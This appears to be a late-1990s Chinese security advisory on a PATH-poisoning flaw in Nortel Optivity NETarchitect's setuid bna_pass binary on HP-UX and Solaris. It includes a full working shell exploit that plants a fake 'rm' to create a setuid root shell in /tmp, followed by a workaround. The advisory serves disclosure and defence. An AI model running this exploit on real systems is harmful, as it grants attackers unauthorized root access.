首页 -> 安全研究

安全研究

安全漏洞
Optivity NETarchitect PATH安全漏洞

发布日期:1999-12-31
更新日期:2000-01-01

受影响系统:
Nortel Networks Optivity NETarchitect 2.0
   - Sun Solaris 2.6
   - Sun Solaris 2.5.1
   - Sun Solaris 2.5
   - HP HP-UX 10.20
   - HP HP-UX 10.1
描述:

    NETarchitect是使复杂的网络系统配置和设计任务简单化的应用程序,由Nortel Networks公司提供,通常包含在Optivity Network Configuration System工具包中。对运行了NETarchitect的HP-UX(Solaris也有可能)系统,在/opt/bna/bin/bna_pass二进制文件中的一个路径(path)漏洞可被利用于获取root权限。bna_pass程序执行'rm'命令时,假定当前用户的PATH变量值是正常的,真正的rm程序会在其中的目录下找到。因此,如果PATH变量被修改,则可能会导致bna_pass以root的权限执行了其它程序。如果攻击者将"."添加到PATH环境变量中,并使系统首先搜索当前目录,就能使伪造的'rm'程序被运行,从而侵入系统。




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


#!/bin/sh
#
# bna.sh - Loneguard 12/31/99
#
# Poision path xploit for Optivity NETarchitect on HPUX
#
cd /tmp
touch /usr/bna/tmp/.loginChk
PATH=.:$PATH;export PATH
cat > rm << _EOF
#!/bin/sh
cp /bin/csh /tmp/kungfu
chmod 4755 /tmp/kungfu
_EOF
chmod 755 /tmp/rm
/opt/bna/bin/bna_pass




建议:

    临时解决方法:清除/opt/bna/bin/bna_pass的suid位。




浏览次数:6558
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障